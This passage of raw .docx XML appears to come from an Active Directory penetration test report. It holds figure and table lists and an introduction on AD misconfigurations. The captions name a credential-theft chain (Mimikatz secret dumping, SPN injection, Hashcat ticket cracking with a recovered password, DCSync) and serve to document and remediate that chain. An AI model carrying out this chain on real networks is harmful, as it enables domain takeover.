            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AC49E14" w14:textId="05A5DD8A" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="007C45C0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="7514E5BE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45E14514" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 10: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>lsadump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>secrets Dumping Cleartext Password for mssqladm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E23F903" w14:textId="699F9443" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="007C45C0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="6D07FFEE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3DBE9B64" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 11: Targeted SPN Injection on ttimmons via bloodyAD GenericWrite Permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="545C1E6C" w14:textId="2F590801" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="00DA1C78" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66F24079" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 12: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Offline TGS Ticket Cracking Recovering Password Repeat09 for ttimmons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="76A05B43" w14:textId="38AED1D4" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="2D226A78" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A82D646" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 13: Group Membership Query Confirming ttimmons Addition to Server Admins Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="18631B7E" w14:textId="1804BDA6" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="48A931AE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C5B5231" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 14: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impacket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> secretsdump.py Performing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DCSync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Replication Dumping NTLM Hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="766CD80C" w14:textId="6E45A3E3" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="70E38934" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DE3BAA7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 15: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BloodHound</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Full Attack Path Visualizing Chained Escalation from hporter to DCSync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="447C555C" w14:textId="1160DAAA" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64138779" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>List of Tables</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7920"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="7BA1C4BF" w14:textId="77777777" w:rsidTr="00EF73F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C412943" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Table Caption &amp; Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4AD8D64A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="08F548D5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0805DADC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Table 1: Target Environment Host Details and Scope Demarcation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63A9ECFB" w14:textId="4FF43741" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00180350">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="288515B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="44F7B938" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Table 2: Tooling Selection and Rationale Matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E8968C4" w14:textId="7F44CD7A" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00180350">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="6634BAAB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="149F310D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Table 3: Summary of Root-Cause Misconfigurations and Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A298734" w14:textId="72B77585" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00180350">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FEA17BA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="003F4CF1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CF9BD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B257FDA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.1 Background &amp; Threat Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6D73D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active Directory (AD) serves as the primary identity, authentication, and authorization backbone for over 90% of Fortune 500 enterprises worldwide. Centralizing management of users, workstations, servers, applications, and security policies, AD provides unified single sign-on (SSO) and Kerberos-based access across modern corporate infrastructure. However, due to decades of legacy growth, cumulative delegation changes, third-party software integration, and operational convenience overrides, Active Directory environments frequently suffer from complex structural misconfigurations. Attackers regularly leverage these misconfigurations to move laterally and escalate privileges without relying on software zero-day exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C218A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
